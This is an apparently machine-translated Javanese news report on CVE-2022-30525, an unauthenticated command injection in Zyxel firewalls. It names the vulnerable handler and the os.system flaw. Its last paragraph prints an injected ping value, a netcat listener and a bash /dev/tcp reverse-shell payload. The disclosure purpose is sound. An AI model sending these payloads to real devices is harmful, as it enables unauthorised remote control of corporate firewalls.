Kerentanan ing firewall Zyxel sing ngidini eksekusi kode tanpa otentikasi

Kerentanan kritis (CVE-2022-30525) wis diidentifikasi ing piranti Zyxel saka seri ATP, VPN lan USG FLEX, sing dirancang kanggo ngatur operasi firewall, IDS lan VPN ing perusahaan, sing ngidini penyerang eksternal nglakokake kode ing piranti tanpa hak pangguna tanpa otentikasi. Kanggo nindakake serangan, panyerang kudu bisa ngirim panjalukan menyang piranti nggunakake protokol HTTP/HTTPS. Zyxel wis ndandani kerentanan ing nganyari perangkat kukuh ZLD 5.30. Miturut layanan Shodan, saiki ana 16213 piranti sing duweni potensi rentan ing jaringan global sing nampa panjalukan liwat HTTP/HTTPS.

Operasi ditindakake kanthi ngirim printah sing dirancang khusus menyang pawang web /ztp/cgi-bin/handler, bisa diakses tanpa otentikasi. Masalah disababaké déning lack of reresik tepat paramèter request nalika nglakokaké printah ing sistem nggunakake os.system telpon digunakake ing perpustakaan lib_wan_settings.py lan kaleksanan nalika Processing operasi setWanPortSt.

Contone, penyerang bisa ngliwati string "; ping 192.168.1.210; kang bakal mimpin kanggo eksekusi "ping 192.168.1.210" printah ing sistem. Kanggo entuk akses menyang cangkang printah, sampeyan bisa mbukak "nc -lvnp 1270" ing sistem sampeyan, banjur miwiti sambungan mbalikke kanthi ngirim panjalukan menyang piranti nganggo '; bash -c \Β»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\Β»;'.

Source: opennet.ru

Add a comment